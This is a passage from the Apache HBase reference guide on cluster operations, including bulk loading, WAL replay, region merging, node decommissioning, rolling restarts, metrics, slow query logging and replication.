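\nThe bulk load can also be triggered programmatically. The following is a minimal sketch using the `LoadIncrementalHFiles` client API; the table name and StoreFile directory are illustrative and match the ImportTsv example above.\n\n[source,java]\n----\nimport org.apache.hadoop.conf.Configuration;\nimport org.apache.hadoop.fs.Path;\nimport org.apache.hadoop.hbase.HBaseConfiguration;\nimport org.apache.hadoop.hbase.TableName;\nimport org.apache.hadoop.hbase.client.Admin;\nimport org.apache.hadoop.hbase.client.Connection;\nimport org.apache.hadoop.hbase.client.ConnectionFactory;\nimport org.apache.hadoop.hbase.client.RegionLocator;\nimport org.apache.hadoop.hbase.client.Table;\nimport org.apache.hadoop.hbase.mapreduce.LoadIncrementalHFiles;\n\npublic class BulkLoadExample {\n  public static void main(String[] args) throws Exception {\n    Configuration conf = HBaseConfiguration.create();\n    TableName tableName = TableName.valueOf(\"datatsv\");\n    try (Connection connection = ConnectionFactory.createConnection(conf);\n         Admin admin = connection.getAdmin();\n         Table table = connection.getTable(tableName);\n         RegionLocator locator = connection.getRegionLocator(tableName)) {\n      \/\/ Move the generated StoreFiles into the table.\n      new LoadIncrementalHFiles(conf).doBulkLoad(\n          new Path(\"hdfs:\/\/storefileoutput\"), admin, table, locator);\n    }\n  }\n}\n----\n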

=== WALPlayer

WALPlayer is a utility to replay WAL files into HBase.

The WAL can be replayed for a set of tables or all tables, and a timerange can be provided (in milliseconds).
The WAL is filtered to this set of tables.
The output can optionally be mapped to another set of tables.

WALPlayer can also generate HFiles for later bulk importing; in that case, only a single table and no mapping can be specified.

Invoke via:

----
$ bin/hbase org.apache.hadoop.hbase.mapreduce.WALPlayer [options] <wal inputdir> <tables> [<tableMappings>]
----

For example:

----
$ bin/hbase org.apache.hadoop.hbase.mapreduce.WALPlayer /backuplogdir oldTable1,oldTable2 newTable1,newTable2
----

WALPlayer, by default, runs as a mapreduce job.
To NOT run WALPlayer as a mapreduce job on your cluster, force it to run all in the local process by adding the flag `-Dmapreduce.jobtracker.address=local` on the command line.

[[rowcounter]]
=== RowCounter and CellCounter

link:http://hbase.apache.org/apidocs/org/apache/hadoop/hbase/mapreduce/RowCounter.html[RowCounter] is a mapreduce job to count all the rows of a table.
This is a good utility to use as a sanity check to ensure that HBase can read all the blocks of a table if there are any concerns of metadata inconsistency.
It will run the mapreduce all in a single process, but it will run faster if you have a MapReduce cluster in place for it to exploit. It is also possible to limit
the time range of data to be scanned by using the `--starttime=[starttime]` and `--endtime=[endtime]` flags.

----
$ bin/hbase org.apache.hadoop.hbase.mapreduce.RowCounter <tablename> [<column1> <column2>...]
----

RowCounter only counts one version per cell.

Note: caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.

HBase ships another diagnostic mapreduce job called link:http://hbase.apache.org/apidocs/org/apache/hadoop/hbase/mapreduce/CellCounter.html[CellCounter].
Like RowCounter, it gathers statistics about your table.
The statistics gathered by CellCounter are more fine-grained and include:

* Total number of rows in the table.
* Total number of CFs across all rows.
* Total qualifiers across all rows.
* Total occurrence of each CF.
* Total occurrence of each qualifier.
* Total number of versions of each qualifier.

The program allows you to limit the scope of the run.
Provide a row regex or prefix to limit the rows to analyze.
Specify a time range to scan the table by using the `--starttime=[starttime]` and `--endtime=[endtime]` flags.

Use `hbase.mapreduce.scan.column.family` to specify scanning a single column family.

----
$ bin/hbase org.apache.hadoop.hbase.mapreduce.CellCounter <tablename> <outputDir> [regex or prefix]
----

Note: just like RowCounter, caching for the input Scan is configured via `hbase.client.scanner.caching` in the job configuration.

=== mlockall

It is possible to optionally pin your servers in physical memory, making them less likely to be swapped out in oversubscribed environments, by having the servers call link:http://linux.die.net/man/2/mlockall[mlockall] on startup.
See link:https://issues.apache.org/jira/browse/HBASE-4391[HBASE-4391 Add ability to
 start RS as root and call mlockall] for how to build the optional library and have it run on startup.

[[compaction.tool]]
=== Offline Compaction Tool

See the usage for the
link:http://hbase.apache.org/devapidocs/org/apache/hadoop/hbase/regionserver/CompactionTool.html[CompactionTool].
Run it like:

[source, bash]
----
$ ./bin/hbase org.apache.hadoop.hbase.regionserver.CompactionTool
----
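
For instance, a single offline major compaction of one column family directory might look like the following. This is only a sketch: the `-compactOnce` and `-major` switches and the HDFS store path are assumptions to verify against the usage output of your HBase version:

[source,bourne]
----
# hypothetical: major-compact one store directory offline, exactly once
$ ./bin/hbase org.apache.hadoop.hbase.regionserver.CompactionTool \
  -compactOnce -major hdfs://namenode:8020/hbase/data/default/<table>/<region>/<family>
----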

=== `hbase clean`

The `hbase clean` command cleans HBase data from ZooKeeper, HDFS, or both.
It is appropriate to use for testing.
Run it with no options for usage instructions.
The `hbase clean` command was introduced in HBase 0.98.

----

$ bin/hbase clean
Usage: hbase clean (--cleanZk|--cleanHdfs|--cleanAll)
Options:
 --cleanZk cleans hbase related data from zookeeper.
 --cleanHdfs cleans hbase related data from hdfs.
 --cleanAll cleans hbase related data from both zookeeper and hdfs.
----

=== `hbase pe`

The `hbase pe` command is a shortcut provided to run the `org.apache.hadoop.hbase.PerformanceEvaluation` tool, which is used for testing.
The `hbase pe` command was introduced in HBase 0.98.4.

The PerformanceEvaluation tool accepts many different options and commands.
For usage instructions, run the command with no options.

To run PerformanceEvaluation prior to HBase 0.98.4, issue the command `hbase org.apache.hadoop.hbase.PerformanceEvaluation`.

The PerformanceEvaluation tool has received many updates in recent HBase releases, including support for namespaces, support for tags, cell-level ACLs and visibility labels, multiget support for RPC calls, increased sampling sizes, an option to randomly sleep during testing, and the ability to "warm up" the cluster before testing starts.

=== `hbase ltt`

The `hbase ltt` command is a shortcut provided to run the `org.apache.hadoop.hbase.util.LoadTestTool` utility, which is used for testing.
The `hbase ltt` command was introduced in HBase 0.98.4.

You must specify either `-write` or `-update-read` as the first option.
For general usage instructions, pass the `-h` option.

To run LoadTestTool prior to HBase 0.98.4, issue the command +hbase org.apache.hadoop.hbase.util.LoadTestTool+.

The LoadTestTool has received many updates in recent HBase releases, including support for namespaces, support for tags, cell-level ACLs and visibility labels, testing security-related features, the ability to specify the number of regions per server, tests for multi-get RPC calls, and tests relating to replication.

[[ops.regionmgt]]
== Region Management

[[ops.regionmgt.majorcompact]]
=== Major Compaction

Major compactions can be requested via the HBase shell or link:http://hbase.apache.org/apidocs/org/apache/hadoop/hbase/client/Admin.html#majorCompact%28java.lang.String%29[Admin.majorCompact].

Note: major compactions do NOT do region merges.
See <<compaction,compaction>> for more information about compactions.

[[ops.regionmgt.merge]]
=== Merge

Merge is a utility that can merge adjoining regions in the same table (see org.apache.hadoop.hbase.util.Merge).

[source,bourne]
----
$ bin/hbase org.apache.hadoop.hbase.util.Merge <tablename> <region1> <region2>
----

If you feel you have too many regions and want to consolidate them, Merge is the utility you need.
Merge must be run when the cluster is down.
See the link:http://ofps.oreilly.com/titles/9781449396107/performance.html[O'Reilly HBase
 Book] for an example of usage.

You will need to pass 3 parameters to this application.
The first one is the table name.
The second one is the fully qualified name of the first region to merge, like "table_name,\x0A,1342956111995.7cef47f192318ba7ccc75b1bbf27a82b.".
The third one is the fully qualified name for the second region to merge.
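
For example, a full invocation might look like the following; the table name and both region names are hypothetical (the second region name in particular is made up for illustration):

[source,bourne]
----
# run only while the cluster is down; region names below are illustrative
$ bin/hbase org.apache.hadoop.hbase.util.Merge table_name \
  "table_name,\x0A,1342956111995.7cef47f192318ba7ccc75b1bbf27a82b." \
  "table_name,\x3B,1342956112000.8dbe47f192318ba7ccc75b1bbf27a82c."
----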

Additionally, there is a Ruby script attached to link:https://issues.apache.org/jira/browse/HBASE-1621[HBASE-1621] for region merging.

[[node.management]]
== Node Management

[[decommission]]
=== Node Decommission

You can stop an individual RegionServer by running the following script in the HBase directory on the particular node:

----
$ ./bin/hbase-daemon.sh stop regionserver
----

The RegionServer will first close all regions and then shut itself down.
On shutdown, the RegionServer's ephemeral node in ZooKeeper will expire.
The master will notice the RegionServer gone and will treat it as a 'crashed' server; it will reassign the regions the RegionServer was carrying.

.Disable the Load Balancer before Decommissioning a node
[NOTE]
====
If the load balancer runs while a node is shutting down, then there could be contention between the Load Balancer and the Master's recovery of the just decommissioned RegionServer.
Avoid any problems by disabling the balancer first.
See <<lb,lb>> below.
====

.Kill Node Tool
[NOTE]
====
In hbase-2.0, in the bin directory, we added a script named _considerAsDead.sh_ that can be used to kill a regionserver.
Hardware issues could be detected by specialized monitoring tools before the zookeeper timeout has expired. _considerAsDead.sh_ is a simple function to mark a RegionServer as dead.
It deletes all the znodes of the server, starting the recovery process.
Plug the script into your monitoring/fault detection tools to initiate faster failover.
Be careful how you use this disruptive tool.
Copy the script if you need to make use of it in a version of hbase previous to hbase-2.0.
====

A downside to the above stop of a RegionServer is that regions could be offline for a good period of time.
Regions are closed in order.
If there are many regions on the server, the first region to close may not be back online until all regions close and after the master notices the RegionServer's znode gone.
In Apache HBase 0.90.2, we added a facility for having a node gradually shed its load and then shut itself down.
Apache HBase 0.90.2 added the _graceful_stop.sh_ script.
Here is its usage:

----
$ ./bin/graceful_stop.sh
Usage: graceful_stop.sh [--config <conf-dir>] [--restart] [--reload] [--thrift] [--rest] <hostname>
 thrift If we should stop/start thrift before/after the hbase stop/start
 rest If we should stop/start rest before/after the hbase stop/start
 restart If we should restart after graceful stop
 reload Move offloaded regions back on to the stopped server
 debug Move offloaded regions back on to the stopped server
 hostname Hostname of server we are to stop
----

To decommission a loaded RegionServer, run the following: +$ ./bin/graceful_stop.sh HOSTNAME+ where `HOSTNAME` is the host carrying the RegionServer you would decommission.

.On `HOSTNAME`
[NOTE]
====
The `HOSTNAME` passed to _graceful_stop.sh_ must match the hostname that hbase is using to identify RegionServers.
Check the list of RegionServers in the master UI for how HBase is referring to servers.
It's usually hostname but can also be FQDN.
Whatever HBase is using, this is what you should pass to the _graceful_stop.sh_ decommission script.
If you pass IPs, the script is not yet smart enough to make a hostname (or FQDN) of it, so it will fail when it checks if the server is currently running; the graceful unloading of regions will not run.
====
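
Putting that together, decommissioning one node is a single call; the hostname below is a placeholder and should match the name shown for the RegionServer in the master UI:

[source,bourne]
----
# rs-node-3.example.com is a placeholder hostname
$ ./bin/graceful_stop.sh rs-node-3.example.com
----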

The _graceful_stop.sh_ script will move the regions off the decommissioned RegionServer one at a time to minimize region churn.
It will verify the region deployed in the new location before it moves the next region, and so on until the decommissioned server is carrying zero regions.
At this point, the _graceful_stop.sh_ script tells the RegionServer to `stop`.
The master will at this point notice the RegionServer gone, but all regions will have already been redeployed, and because the RegionServer went down cleanly, there will be no WAL logs to split.

[[lb]]
.Load Balancer
[NOTE]
====
It is assumed that the Region Load Balancer is disabled while the `graceful_stop` script runs (otherwise the balancer and the decommission script will end up fighting over region deployments). Use the shell to disable the balancer:

[source]
----
hbase(main):001:0> balance_switch false
true
0 row(s) in 0.3590 seconds
----

This turns the balancer OFF.
To reenable, do:

[source]
----
hbase(main):001:0> balance_switch true
false
0 row(s) in 0.3590 seconds
----

The `graceful_stop` script will check the balancer and, if it is enabled, will turn it off before it goes to work.
If it exits prematurely because of an error, it will not have reset the balancer.
Hence, it is better to manage the balancer apart from `graceful_stop`, reenabling it after you are done with `graceful_stop`.
====

[[draining.servers]]
==== Decommissioning Several Region Servers Concurrently

If you have a large cluster, you may want to decommission more than one machine at a time by gracefully stopping multiple RegionServers concurrently.
To gracefully drain multiple regionservers at the same time, RegionServers can be put into a "draining" state.
This is done by marking a RegionServer as a draining node by creating an entry in ZooKeeper under the _hbase_root/draining_ znode.
This znode has format `name,port,startcode` just like the regionserver entries under the _hbase_root/rs_ znode.

Without this facility, decommissioning multiple nodes may be non-optimal because regions that are being drained from one region server may be moved to other regionservers that are also draining.
Marking RegionServers to be in the draining state prevents this from happening.
See this link:http://inchoate-clatter.blogspot.com/2012/03/hbase-ops-automation.html[blog
 post] for more details.

[[bad.disk]]
==== Bad or Failing Disk

It is good to have <<dfs.datanode.failed.volumes.tolerated,dfs.datanode.failed.volumes.tolerated>> set if you have a decent number of disks per machine, for the case where a disk plain dies.
But usually disks do the "John Wayne" -- i.e.
take a while to go down spewing errors in _dmesg_ -- or for some reason, run much slower than their companions.
In this case you want to decommission the disk.
You have two options.
You can link:http://wiki.apache.org/hadoop/FAQ#I_want_to_make_a_large_cluster_smaller_by_taking_out_a_bunch_of_nodes_simultaneously._How_can_this_be_done.3F[decommission
 the datanode] or, less disruptive in that only the bad disk's data will be rereplicated, you can stop the datanode, unmount the bad volume (you can't umount a volume while the datanode is using it), and then restart the datanode (presuming you have set dfs.datanode.failed.volumes.tolerated > 0).
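
On a Hadoop 2 deployment, the less disruptive option might look like the following sketch; the daemon script location and the mount point are assumptions to adapt to your install:

[source,bourne]
----
# a sketch, assuming the failing volume is mounted at /data/3 (hypothetical)
$ $HADOOP_HOME/sbin/hadoop-daemon.sh stop datanode   # the volume cannot be unmounted while in use
$ umount /data/3
$ $HADOOP_HOME/sbin/hadoop-daemon.sh start datanode
----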

The regionserver will throw some errors in its logs as it recalibrates where to get its data from -- it will likely roll its WAL log too -- but in general, apart from some latency spikes, it should keep on chugging.

.Short Circuit Reads
[NOTE]
====
If you are doing short-circuit reads, you will have to move the regions off the regionserver before you stop the datanode; with short-circuit reads, even though the files have been chmod'd so the regionserver cannot access them, the regionserver already has the files open and will be able to keep reading the file blocks from the bad disk even though the datanode is down.
Move the regions back after you restart the datanode.
====

[[rolling]]
=== Rolling Restart

Some cluster configuration changes require either the entire cluster, or the RegionServers, to be restarted in order to pick up the changes.
In addition, rolling restarts are supported for upgrading to a minor or maintenance release, and to a major release if at all possible.
See the release notes for the release you want to upgrade to, to find out about limitations to the ability to perform a rolling upgrade.

There are multiple ways to restart your cluster nodes, depending on your situation.
These methods are detailed below.

==== Using the `rolling-restart.sh` Script

HBase ships with a script, _bin/rolling-restart.sh_, that allows you to perform rolling restarts on the entire cluster, the master only, or the RegionServers only.
The script is provided as a template for your own script, and is not explicitly tested.
It requires password-less SSH login to be configured and assumes that you have deployed using a tarball.
The script requires you to set some environment variables before running it.
Examine the script and modify it to suit your needs.

._rolling-restart.sh_ General Usage
====
----

$ ./bin/rolling-restart.sh --help
Usage: rolling-restart.sh [--config <hbase-confdir>] [--rs-only] [--master-only] [--graceful] [--maxthreads xx]
----
====

Rolling Restart on RegionServers Only::
 To perform a rolling restart on the RegionServers only, use the `--rs-only` option.
 This might be necessary if you need to reboot the individual RegionServer or if you make a configuration change that only affects RegionServers and not the other HBase processes.

Rolling Restart on Masters Only::
 To perform a rolling restart on the active and backup Masters, use the `--master-only` option.
 You might use this if you know that your configuration change only affects the Master and not the RegionServers, or if you need to restart the server where the active Master is running.

Graceful Restart::
 If you specify the `--graceful` option, RegionServers are restarted using the _bin/graceful_stop.sh_ script, which moves regions off a RegionServer before restarting it.
 This is safer, but can delay the restart.

Limiting the Number of Threads::
 To limit the rolling restart to using only a specific number of threads, use the `--maxthreads` option.
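
Combining these options, a cautious RegionServer-only rolling restart could be launched as follows; the thread count is just an example value:

[source,bourne]
----
# graceful, RegionServers only, at most two servers restarting at a time
$ ./bin/rolling-restart.sh --rs-only --graceful --maxthreads 2
----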

[[rolling.restart.manual]]
==== Manual Rolling Restart

To retain more control over the process, you may wish to manually do a rolling restart across your cluster.
This uses the _graceful_stop.sh_ script described in <<decommission,decommission>>.
In this method, you can restart each RegionServer individually and then move its old regions back into place, retaining locality.
If you also need to restart the Master, you need to do it separately, and restart the Master before restarting the RegionServers using this method.
The following is an example of such a command.
You may need to tailor it to your environment.
This script does a rolling restart of RegionServers only.
It disables the load balancer before moving the regions.

----

$ for i in `cat conf/regionservers|sort`; do ./bin/graceful_stop.sh --restart --reload --debug $i; done &> /tmp/log.txt &
----

Monitor the output of the _/tmp/log.txt_ file to follow the progress of the script.

==== Logic for Crafting Your Own Rolling Restart Script

Use the following guidelines if you want to create your own rolling restart script.

. Extract the new release, verify its configuration, and synchronize it to all nodes of your cluster using `rsync`, `scp`, or another secure synchronization mechanism.
. Use the hbck utility to ensure that the cluster is consistent.
+
----

$ ./bin/hbck
----
+
Perform repairs if required.
See <<hbck,hbck>> for details.

. Restart the master first.
 You may need to modify these commands if your new HBase directory is different from the old one, such as for an upgrade.
+
----

$ ./bin/hbase-daemon.sh stop master; ./bin/hbase-daemon.sh start master
----

. Gracefully restart each RegionServer, using a script such as the following, from the Master.
+
----

$ for i in `cat conf/regionservers|sort`; do ./bin/graceful_stop.sh --restart --reload --debug $i; done &> /tmp/log.txt &
----
+
If you are running Thrift or REST servers, pass the --thrift or --rest options.
For other available options, run the `bin/graceful_stop.sh --help` command.
+
It is important to drain HBase regions slowly when restarting multiple RegionServers.
Otherwise, multiple regions go offline simultaneously and must be reassigned to other nodes, which may also go offline soon.
This can negatively affect performance.
You can inject delays into the script above, for instance, by adding a Shell command such as `sleep`.
To wait for 5 minutes between each RegionServer restart, modify the above script to the following:
+
----

$ for i in `cat conf/regionservers|sort`; do ./bin/graceful_stop.sh --restart --reload --debug $i & sleep 5m; done &> /tmp/log.txt &
----

. Restart the Master again, to clear out the dead servers list and re-enable the load balancer.
. Run the `hbck` utility again, to be sure the cluster is consistent.

[[adding.new.node]]
=== Adding a New Node

Adding a new regionserver in HBase is essentially free; you simply start it like this: `$ ./bin/hbase-daemon.sh start regionserver` and it will register itself with the master.
Ideally you also started a DataNode on the same machine so that the RS can eventually start to have local files.
If you rely on ssh to start your daemons, don't forget to add the new hostname in _conf/regionservers_ on the master.

At this point the region server isn't serving data because no regions have moved to it yet.
If the balancer is enabled, it will start moving regions to the new RS.
On a small/medium cluster this can have a very adverse effect on latency as a lot of regions will be offline at the same time.
It is thus recommended to disable the balancer the same way it's done when decommissioning a node, and to move the regions manually (or even better, using a script that moves them one by one).

The moved regions will all have 0% locality and won't have any blocks in cache, so the region server will have to use the network to serve requests.
Apart from resulting in higher latency, it may also consume all of your network card's capacity.
For practical purposes, consider that a standard 1GigE NIC won't be able to read much more than _100MB/s_.
In this case, or if you are in an OLAP environment and require having locality, then it is recommended to major compact the moved regions.

[[hbase_metrics]]
== HBase Metrics

HBase emits metrics which adhere to the link:http://hadoop.apache.org/core/docs/current/api/org/apache/hadoop/metrics/package-summary.html[Hadoop metrics] API.
Starting with HBase 0.95footnote:[The Metrics system was redone in
 HBase 0.96.
See Migration\n to the New Metrics Hotness \u2013 Metrics2 by Elliot Clark for detail], HBase is configured to emit a default set of metrics with a default sampling period of every 10 seconds.\nYou can use HBase metrics in conjunction with Ganglia.\nYou can also filter which metrics are emitted and extend the metrics framework to capture custom metrics appropriate for your environment.\n\n=== Metric Setup\n\nFor HBase 0.95 and newer, HBase ships with a default metrics configuration, or [firstterm]_sink_.\nThis includes a wide variety of individual metrics, and emits them every 10 seconds by default.\nTo configure metrics for a given region server, edit the _conf\/hadoop-metrics2-hbase.properties_ file.\nRestart the region server for the changes to take effect.\n\nTo change the sampling rate for the default sink, edit the line beginning with `*.period`.\nTo filter which metrics are emitted or to extend the metrics framework, see http:\/\/hadoop.apache.org\/docs\/current\/api\/org\/apache\/hadoop\/metrics2\/package-summary.html\n\n.HBase Metrics and Ganglia\n[NOTE]\n====\nBy default, HBase emits a large number of metrics per region server.\nGanglia may have difficulty processing all these metrics.\nConsider increasing the capacity of the Ganglia server or reducing the number of metrics emitted by HBase.\nSee link:http:\/\/hadoop.apache.org\/docs\/current\/api\/org\/apache\/hadoop\/metrics2\/package-summary.html#filtering[Metrics Filtering].\n====\n\n=== Disabling Metrics\n\nTo disable metrics for a region server, edit the _conf\/hadoop-metrics2-hbase.properties_ file and comment out any uncommented lines.\nRestart the region server for the changes to take effect.\n\n[[discovering.available.metrics]]\n=== Discovering Available Metrics\n\nRather than listing each metric which HBase emits by default, you can browse through the available metrics, either as a JSON output or via JMX.\nDifferent metrics are exposed for the Master process and each region server process.\n\n.Procedure: Access a JSON Output of Available Metrics\n. After starting HBase, access the region server's web UI, at pass:[http:\/\/REGIONSERVER_HOSTNAME:60030] by default (or port 16030 in HBase 1.0+).\n. Click the [label]#Metrics Dump# link near the top.\n The metrics for the region server are presented as a dump of the JMX bean in JSON format.\n This will dump out all metrics names and their values.\n To include metrics descriptions in the listing -- this can be useful when you are exploring what is available -- add a query string of `?description=true` so your URL becomes pass:[http:\/\/REGIONSERVER_HOSTNAME:60030\/jmx?description=true].\n Not all beans and attributes have descriptions.\n. To view metrics for the Master, connect to the Master's web UI instead (defaults to pass:[http:\/\/localhost:60010] or port 16010 in HBase 1.0+) and click its [label]#Metrics\n Dump# link.\n To include metrics descriptions in the listing -- this can be useful when you are exploring what is available -- add a query string of `?description=true` so your URL becomes pass:[http:\/\/REGIONSERVER_HOSTNAME:60010\/jmx?description=true].\n Not all beans and attributes have descriptions.\n\n\nYou can use many different tools to view JMX content by browsing MBeans.\nThis procedure uses `jvisualvm`, which is an application usually available in the JDK.\n\n.Procedure: Browse the JMX Output of Available Metrics\n. Start HBase, if it is not already running.\n. 
Run the `jvisualvm` command on a host with a GUI display.
 You can launch it from the command line or another method appropriate for your operating system.
. Be sure the [label]#VisualVM-MBeans# plugin is installed. Browse to *Tools -> Plugins*. Click [label]#Installed# and check whether the plugin is listed.
 If not, click [label]#Available Plugins#, select it, and click btn:[Install].
 When finished, click btn:[Close].
. To view details for a given HBase process, double-click the process in the [label]#Local# sub-tree in the left-hand panel.
 A detailed view opens in the right-hand panel.
 Click the [label]#MBeans# tab at the top of the right-hand panel.
. To access the HBase metrics, navigate to the appropriate sub-bean:
.* Master:
.* RegionServer:

. The name of each metric and its current value is displayed in the [label]#Attributes# tab.
 For a view which includes more details, including the description of each attribute, click the [label]#Metadata# tab.

=== Units of Measure for Metrics

Different metrics are expressed in different units, as appropriate.
Often, the unit of measure is in the name (as in the metric `shippedKBs`). Otherwise, use the following guidelines.
When in doubt, you may need to examine the source for a given metric.

* Metrics that refer to a point in time are usually expressed as a timestamp.
* Metrics that refer to an age (such as `ageOfLastShippedOp`) are usually expressed in milliseconds.
* Metrics that refer to memory sizes are in bytes.
* Sizes of queues (such as `sizeOfLogQueue`) are expressed as the number of items in the queue.
 Determine the size by multiplying by the block size (default is 64 MB in HDFS).
* Metrics that refer to things like the number of a given type of operations (such as `logEditsRead`) are expressed as an integer.

[[master_metrics]]
=== Most Important Master Metrics

Note: Counts are usually over the last metrics reporting interval.

hbase.master.numRegionServers::
 Number of live regionservers

hbase.master.numDeadRegionServers::
 Number of dead regionservers

hbase.master.ritCount::
 The number of regions in transition

hbase.master.ritCountOverThreshold::
 The number of regions that have been in transition longer than a threshold time (default: 60 seconds)

hbase.master.ritOldestAge::
 The age of the longest region in transition, in milliseconds

[[rs_metrics]]
=== Most Important RegionServer Metrics

Note: Counts are usually over the last metrics reporting interval.

hbase.regionserver.regionCount::
 The number of regions hosted by the regionserver

hbase.regionserver.storeFileCount::
 The number of store files on disk currently managed by the regionserver

hbase.regionserver.storeFileSize::
 Aggregate size of the store files on disk

hbase.regionserver.hlogFileCount::
 The number of write ahead logs not yet archived

hbase.regionserver.totalRequestCount::
 The total number of requests received

hbase.regionserver.readRequestCount::
 The number of read requests received

hbase.regionserver.writeRequestCount::
 The number of write requests received

hbase.regionserver.numOpenConnections::
 The number of open connections at the RPC layer

hbase.regionserver.numActiveHandler::
 The number of RPC handlers actively servicing requests

hbase.regionserver.numCallsInGeneralQueue::
 The number of currently enqueued user requests

hbase.regionserver.numCallsInReplicationQueue::
 The number of currently enqueued operations
received from replication\n\nhbase.regionserver.numCallsInPriorityQueue::\n The number of currently enqueued priority (internal housekeeping) requests\n\nhbase.regionserver.flushQueueLength::\n Current depth of the memstore flush queue.\n If increasing, we are falling behind with clearing memstores out to HDFS.\n\nhbase.regionserver.updatesBlockedTime::\n Number of milliseconds updates have been blocked so the memstore can be flushed\n\nhbase.regionserver.compactionQueueLength::\n Current depth of the compaction request queue.\n If increasing, we are falling behind with storefile compaction.\n\nhbase.regionserver.blockCacheHitCount::\n The number of block cache hits\n\nhbase.regionserver.blockCacheMissCount::\n The number of block cache misses\n\nhbase.regionserver.blockCacheExpressHitPercent ::\n The percent of the time that requests with the cache turned on hit the cache\n\nhbase.regionserver.percentFilesLocal::\n Percent of store file data that can be read from the local DataNode, 0-100\n\nhbase.regionserver.<op>_<measure>::\n Operation latencies, where <op> is one of Append, Delete, Mutate, Get, Replay, Increment; and where <measure> is one of min, max, mean, median, 75th_percentile, 95th_percentile, 99th_percentile\n\nhbase.regionserver.slow<op>Count ::\n The number of operations we thought were slow, where <op> is one of the list above\n\nhbase.regionserver.GcTimeMillis::\n Time spent in garbage collection, in milliseconds\n\nhbase.regionserver.GcTimeMillisParNew::\n Time spent in garbage collection of the young generation, in milliseconds\n\nhbase.regionserver.GcTimeMillisConcurrentMarkSweep::\n Time spent in garbage collection of the old generation, in milliseconds\n\nhbase.regionserver.authenticationSuccesses::\n Number of client connections where authentication succeeded\n\nhbase.regionserver.authenticationFailures::\n Number of client connection authentication failures\n\nhbase.regionserver.mutationsWithoutWALCount ::\n Count of writes submitted with a flag indicating they should bypass the write ahead log\n\n[[ops.monitoring]]\n== HBase Monitoring\n\n[[ops.monitoring.overview]]\n=== Overview\n\nThe following metrics are arguably the most important to monitor for each RegionServer for \"macro monitoring\", preferably with a system like link:http:\/\/opentsdb.net\/[OpenTSDB].\nIf your cluster is having performance issues it's likely that you'll see something unusual with this group.\n\nHBase::\n * See <<rs_metrics,rs metrics>>\n\nOS::\n * IO Wait\n * User CPU\n\nJava::\n * GC\n\nFor more information on HBase metrics, see <<hbase_metrics,hbase metrics>>.\n\n[[ops.slow.query]]\n=== Slow Query Log\n\nThe HBase slow query log consists of parseable JSON structures describing the properties of those client operations (Gets, Puts, Deletes, etc.) 
that either took too long to run, or produced too much output.
The thresholds for "too long to run" and "too much output" are configurable, as described below.
The output is produced inline in the main region server logs so that it is easy to discover further details from context with other logged events.
It is also prepended with identifying tags `(responseTooSlow)`, `(responseTooLarge)`, `(operationTooSlow)`, and `(operationTooLarge)` in order to enable easy filtering with grep, in case the user desires to see only slow queries.

==== Configuration

There are two configuration knobs that can be used to adjust the thresholds for when queries are logged.

* `hbase.ipc.warn.response.time` Maximum number of milliseconds that a query can be run without being logged.
 Defaults to 10000, or 10 seconds.
 Can be set to -1 to disable logging by time.
* `hbase.ipc.warn.response.size` Maximum byte size of response that a query can return without being logged.
 Defaults to 100 megabytes.
 Can be set to -1 to disable logging by size.

==== Metrics

The slow query log exposes two metrics to JMX.

* `hadoop.regionserver_rpc_slowResponse` a global metric reflecting the durations of all responses that triggered logging.
* `hadoop.regionserver_rpc_methodName.aboveOneSec` A metric reflecting the durations of all responses that lasted for more than one second.

==== Output

The output is tagged with the operation, e.g. `(operationTooSlow)`, if the call was a client operation, such as a Put, Get, or Delete, which we expose detailed fingerprint information for.
If not, it is tagged `(responseTooSlow)` and still produces parseable JSON output, but with less verbose information solely regarding its duration and size in the RPC itself. `TooLarge` is substituted for `TooSlow` if the response size triggered the logging, with `TooLarge` appearing even in the case that both size and duration triggered logging.

==== Example

[source]
----
2011-09-08 10:01:25,824 WARN org.apache.hadoop.ipc.HBaseServer: (operationTooSlow): {"tables":{"riley2":{"puts":[{"totalColumns":11,"families":{"actions":[{"timestamp":1315501284459,"qualifier":"0","vlen":9667580},{"timestamp":1315501284459,"qualifier":"1","vlen":10122412},{"timestamp":1315501284459,"qualifier":"2","vlen":11104617},{"timestamp":1315501284459,"qualifier":"3","vlen":13430635}]},"row":"cfcd208495d565ef66e7dff9f98764da:0"}],"families":["actions"]}},"processingtimems":956,"client":"10.47.34.63:33623","starttimems":1315501284456,"queuetimems":0,"totalPuts":1,"class":"HRegionServer","responsesize":0,"method":"multiPut"}
----

Note that everything inside the "tables" structure is output produced by MultiPut's fingerprint, while the rest of the information is RPC-specific, such as processing time and client IP/port.
Other client operations follow the same pattern and the same general structure, with necessary differences due to the nature of the individual operations.
In the case that the call is not a client operation, that detailed fingerprint information will be completely absent.

This particular example would indicate that the likely cause of slowness is simply a very large (on the order of 100MB) multiput, as we can tell by the "vlen," or value length, fields of each put in the multiPut.
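
Because of those identifying tags, pulling only the slow-query events out of a region server log is a one-liner; the log path below is illustrative:

[source,bourne]
----
# surface only slow/large query warnings (log location varies by install)
$ grep -E '\((operation|response)Too(Slow|Large)\)' /var/log/hbase/hbase-regionserver.log
----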

=== Block Cache Monitoring

Starting with HBase 0.98, the HBase Web UI includes the ability to monitor and report on the performance of the block cache.
To view the block cache reports, see the region server's web UI.
Following are a few examples of the reporting capabilities.

.Basic Info
image::bc_basic.png[]

.Config
image::bc_config.png[]

.Stats
image::bc_stats.png[]

.L1 and L2
image::bc_l1.png[]

This is not an exhaustive list of all the screens and reports available.
Have a look in the Web UI.

== Cluster Replication

NOTE: This information was previously available at
link:http://hbase.apache.org#replication[Cluster Replication].

HBase provides a cluster replication mechanism which allows you to keep one cluster's state synchronized with that of another cluster, using the write-ahead log (WAL) of the source cluster to propagate the changes.
Some use cases for cluster replication include:

* Backup and disaster recovery
* Data aggregation
* Geographic data distribution
* Online data ingestion combined with offline data analytics

NOTE: Replication is enabled at the granularity of the column family.
Before enabling replication for a column family, create the table and all column families to be replicated, on the destination cluster.

=== Replication Overview

Cluster replication uses a source-push methodology.
An HBase cluster can be a source (also called master or active, meaning that it is the originator of new data), a destination (also called slave or passive, meaning that it receives data via replication), or can fulfill both roles at once.
Replication is asynchronous, and the goal of replication is eventual consistency.
When the source receives an edit to a column family with replication enabled, that edit is propagated to all destination clusters using the WAL for that column family on the RegionServer managing the relevant region.

When data is replicated from one cluster to another, the original source of the data is tracked via a cluster ID which is part of the metadata.
In HBase 0.96 and newer (link:https://issues.apache.org/jira/browse/HBASE-7709[HBASE-7709]), all clusters which have already consumed the data are also tracked.
This prevents replication loops.

The WALs for each region server must be kept in HDFS as long as they are needed to replicate data to any slave cluster.
